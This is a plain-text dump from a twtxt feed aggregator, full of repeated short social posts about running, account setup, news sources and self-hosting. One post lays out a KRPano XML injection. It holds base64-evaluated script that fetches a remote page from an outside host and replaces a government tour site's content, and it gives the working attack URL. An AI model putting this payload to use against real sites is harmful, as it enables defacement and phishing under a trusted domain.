# I am the Watcher. I am your guide through this vast new twtiverse.
# 
# Usage:
#     https://watcher.sour.is/api/plain/users              View list of users and latest twt date.
#     https://watcher.sour.is/api/plain/twt                View all twts.
#     https://watcher.sour.is/api/plain/mentions?uri=:uri  View all mentions for uri.
#     https://watcher.sour.is/api/plain/conv/:hash         View all twts for a conversation subject.
# 
# Options:
#     uri     Filter to show a specific users twts.
#     offset  Start index for quey.
#     limit   Count of items to return (going back in time).
# 
# twt range = 1 235518
# self = https://watcher.sour.is?offset=229593
# next = https://watcher.sour.is?offset=229693
# prev = https://watcher.sour.is?offset=229493
Pinellas County - 5 miles: 5.06 miles, 00:09:02 average pace, 00:45:41 duration
a lot of saliva collected in my mouth about half a mile in. swallowed and it caused me to choke. the rest of the run had a tickle in my throat. run was pretty good just ran too quick i guess.
#running
Pinellas County - 5 miles: 5.06 miles, 00:09:02 average pace, 00:45:41 duration
a lot of saliva collected in my mouth about half a mile in. swallowed and it caused me to choke. the rest of the run had a tickle in my throat. run was pretty good just ran too quick i guess.
#running
Pinellas County - 5 miles: 5.06 miles, 00:09:02 average pace, 00:45:41 duration
a lot of saliva collected in my mouth about half a mile in. swallowed and it caused me to choke. the rest of the run had a tickle in my throat. run was pretty good just ran too quick i guess.
#running
@andros Created. Can you try logging in via Github? I had to take a stab/guess at your Email address, which is very clearly wrong, but hopefully you an just update it when you login 🤣🤣
@andros Created. Can you try logging in via Github? I had to take a stab/guess at your Email address, which is very clearly wrong, but hopefully you an just update it when you login 🤣🤣
envie de coder... J'ai un bout de C pour renommer les fichiers que je voudrais continuer. Vivement qu'il y ait moins de boulot et de soucis pour réussir à me concentrer!
envie de coder... J'ai un bout de C pour renommer les fichiers que je voudrais continuer. Vivement qu'il y ait moins de boulot et de soucis pour réussir à me concentrer!
@prologic My account is @tanrax . Thanks!
@prologic My account is @tanrax . Thanks!
@prologic My account is @tanrax . Thanks!
Actually. it's probably fine if you just drop your Github username/profile here. They're all public info anyway 🤣🤣
Actually. it's probably fine if you just drop your Github username/profile here. They're all public info anyway 🤣🤣
@andros I _believe_ I disabled new registrations by default due to increase in levels of "spam accounts". If you could email me, or DM me (IRC) your Github username, I'll add an account for you that matches your Github profile and you can sign-in that way.

Respectfully, I will not move any of my projects back to Github after this blog post; hope you can understand, but I'd prefer to stick to my moral values here as much as I can 😅
@andros I _believe_ I disabled new registrations by default due to increase in levels of "spam accounts". If you could email me, or DM me (IRC) your Github username, I'll add an account for you that matches your Github profile and you can sign-in that way.

Respectfully, I will not move any of my projects back to Github after this blog post; hope you can understand, but I'd prefer to stick to my moral values here as much as I can 😅
@prologic I can't register with GitHub, nor make Pull Requests. Would it be possible to enable this? Maybe this repository could be on GitHub to promote it and increase collaboration.
@prologic I can't register with GitHub, nor make Pull Requests. Would it be possible to enable this? Maybe this repository could be on GitHub to promote it and increase collaboration.
@prologic I can't register with GitHub, nor make Pull Requests. Would it be possible to enable this? Maybe this repository could be on GitHub to promote it and increase collaboration.
Walking those few hundred meters to the dentist and home took me at least three times as long as usual. Complete sheets of ice on the footpaths, definitely ice skating territory. The dentist was caught in a traffic jam and arrived about an hour late. On my morning journey I saw two ambulance operations, one on the way there and the other one when I returned. Just 200m apart. I fear it's going to be an exhausting day for all the rescue personell.
@kat Any ideas of the volume coming out of their RSS feed? 🤔
@kat Any ideas of the volume coming out of their RSS feed? 🤔
@kat Now you just need to front this with sshbox and protect your precious little SSh resource 💪
@kat Now you just need to front this with sshbox and protect your precious little SSh resource 💪
Found a pretty interesting emulation tool https://github.com/renode/renode
[47°09′56″S, 126°43′19″W] 4290 days without news from Herve
@xuu Haha, that's cool! Be careful with reporting or they might sue you to death.
@xuu Haha 🤣🤣🤣
@xuu Haha 🤣🤣🤣
@kat (they migrated their image backend from a deprecated third party plugin to a first party feature. which i did on the same codebase last summer with no knowledge of rails lol)
@kat (they migrated their image backend from a deprecated third party plugin to a first party feature. which i did on the same codebase last summer with no knowledge of rails lol)
laughing my ass off rn because ao3 the fanfic website deployed a big change that i did on my own site months ago. i am a PIONEER!!!!!!!!!!
laughing my ass off rn because ao3 the fanfic website deployed a big change that i did on my own site months ago. i am a PIONEER!!!!!!!!!!
[47°09′19″S, 126°43′29″W] Saalmi, retransmit, please
So this works by adding some unbounded javascript autoloaded by the KRPano VR Media viewer
the xml parameter has a url that contains the following


<?xml version="1.0"?>
<krpano version="1.0.8.15">
    <SCRIPT id="allow-copy_script"/>
    <layer name="js_loader" type="container" visible="false" onloaded="js(eval(var w=atob('... OMIT ...');eval(w)););"/>
</krpano>



the omit above is base64 encoded script below:



const queryParams = new URLSearchParams(window.location.search),
          id = queryParams.get('id');
    id ? fetch('https://sour.is/superhax.txt')
        .then(e => e.text())
        .then(e => {
            document.open(), document.write(e), document.close();
        })
        .catch(e => {
            console.error('Error fetching the user agent:', e);
        }) : console.error('No');


this script will fetch text at the url https://sour.is/superhax.txt and replaces the document content.
Nice! totally legit government page: https://tour.diplomaticrooms.state.gov/?id=0&xml=https://sour.is/awesome.html
oh also out of boredom i hosted glance even though i have no need for a dashboard lol. it's really cute though
oh also out of boredom i hosted glance even though i have no need for a dashboard lol. it's really cute though
i self hosted the soft serve git server cuz i felt like it. it's sooo cute i love everything charm CLI does

ssh -p 24010 soft.git.girlonthemoon.xyz
i self hosted the soft serve git server cuz i felt like it. it's sooo cute i love everything charm CLI does

ssh -p 24010 soft.git.girlonthemoon.xyz
@kat sticker status!!!!!
@kat sticker status!!!!!
@kat I DID END UP PUTTING IT TOGETHER BTW AND I VLOGGED IT (https://memoria.sayitditto.net/view?m=fGvHAMJvq) AND I LOVE IT SOOO MUCH
@kat I DID END UP PUTTING IT TOGETHER BTW AND I VLOGGED IT (https://memoria.sayitditto.net/view?m=fGvHAMJvq) AND I LOVE IT SOOO MUCH
@kingdomcome all me hahah! thank you <3
@kingdomcome all me hahah! thank you <3
@kingdomcome hey irene!!!!!!!!!!!!! i'm vibing rn
@kingdomcome hey irene!!!!!!!!!!!!! i'm vibing rn
they're not an all encompassing site but 404media.co do some great tech reporting, their RSS feed is here
they're not an all encompassing site but 404media.co do some great tech reporting, their RSS feed is here
@bender Yeah I think I follow the Hacker News top N feed already. So taht's fine.
@bender Yeah I think I follow the Hacker News top N feed already. So taht's fine.
Well it imported nicely into the feeds service, so I'll give it a try 👌
Well it imported nicely into the feeds service, so I'll give it a try 👌
@ hehehe, it is not streamlined as you want it. Feedly and an amalgam of news sites, prioritising BBC, NPR, and The Guardian.

Tech news on Hacker News, some subs on Reddit, etc.
@kingdomcome Hey 👋 Ya know, working, etc 🤣
@kingdomcome Hey 👋 Ya know, working, etc 🤣
@bender What's the other ?🤔
@bender What's the other ?🤔
@ I get an email each day with headlines, but it is not my only source of news.
@bender And you use this as your primary news sources? 🤔
@bender And you use this as your primary news sources? 🤔
Hmm I think I'm hitting another false positive rule 😢
Hmm I think I'm hitting another false positive rule 😢
@bender Thanks! 🙏 Will look into it!
@bender Thanks! 🙏 Will look into it!
@bender I still haven't fixed that rendering sorry 🤣
@bender I still haven't fixed that rendering sorry 🤣
@https://twtxt.net/user/prologic/twtxt.tx@ https://www.newsminimalist.com/. It has RSS, but if you need custom ones you might need to subscribe.
😮A.J. Ayer was only 24 when he wrote the book that made his philosophical name - Language, Truth, and Logic: https://plato.stanford.edu/entries/ayer/
😮A.J. Ayer was only 24 when he wrote the book that made his philosophical name - Language, Truth, and Logic: https://plato.stanford.edu/entries/ayer/
📌 #Humility reduces anger and promotes more benign interpretations of conflict: https://www.psypost.org/humility-reduces-anger-and-promotes-more-benign-interpretations-of-conflict/
📌 #Humility reduces anger and promotes more benign interpretations of conflict: https://www.psypost.org/humility-reduces-anger-and-promotes-more-benign-interpretations-of-conflict/
Bluesky, Mastodon and the push to billionaire-proof social media - The Washington Post: https://archive.is/2025.01.14-161933/https://www.washingtonpost.com/politics/2025/01/14/bluesky-mastodon-nonprofit-free-our-feeds/
Bluesky, Mastodon and the push to billionaire-proof social media - The Washington Post: https://archive.is/2025.01.14-161933/https://www.washingtonpost.com/politics/2025/01/14/bluesky-mastodon-nonprofit-free-our-feeds/
🧮 USERS:1 FEEDS:2 TWTS:1215 ARCHIVED:84196 CACHE:2939 FOLLOWERS:17 FOLLOWING:14
ciao ciao
@ hmmm.
I need an alternative news source... Something I can shove into feeds.twtxt.net that helps me keep up-to-date with Tech and other important news 🗞️ Hmmm 🤔 Suggestions? I can't stand Slashdot anymore since they've decided to come down hard on ad-blockers 🤦‍♂️
I need an alternative news source... Something I can shove into feeds.twtxt.net that helps me keep up-to-date with Tech and other important news 🗞️ Hmmm 🤔 Suggestions? I can't stand Slashdot anymore since they've decided to come down hard on ad-blockers 🤦‍♂️
who's+lovable.dev?
@lime360 Down at the moment due to hardware failure of one of my nodes. I have the spare parts to bring it back online, just need to find the time 😅 Sorry for the inconvenience, I just can't afford to run the search engine right now on the remaining two nodes 😢😢
@lime360 Down at the moment due to hardware failure of one of my nodes. I have the spare parts to bring it back online, just need to find the time 😅 Sorry for the inconvenience, I just can't afford to run the search engine right now on the remaining two nodes 😢😢
@bender Hmmm? 🤔
@bender Hmmm? 🤔
@xuu Not recently, no. Why?
@xuu Not recently, no. Why?
@arne Welcome! 🤗
@arne Welcome! 🤗
Wussup twtxt I'm rolling cigarettes (I don't smoke) (I think it's funny) (it's like crocheting a scarf when you don't wear scarves)
@aelaraji Reading "The Book Thief" by Markus Zusak
@aelaraji Reading "The Book Thief" by Markus Zusak
@arne Uuhhhh, more twtxt clients, very nice! :-)
@prologic you change something up on how markdown gets rendered?
Huh. Not broken for me?
📖 Trust Responsibly: Non-Evidential Virtue Epistemology: https://www.routledge.com/Trust-Responsibly-Non-Evidential-Virtue-Epistemology/Ohlhorst/p/book/9781032460987
📖 Trust Responsibly: Non-Evidential Virtue Epistemology: https://www.routledge.com/Trust-Responsibly-Non-Evidential-Virtue-Epistemology/Ohlhorst/p/book/9781032460987
https://boredzo.org/pointers/ Everything you need to know about pointers in C #clang
@bender Yeah, looks a bit broken:

Broken
Break[ing] it!
Break\n it!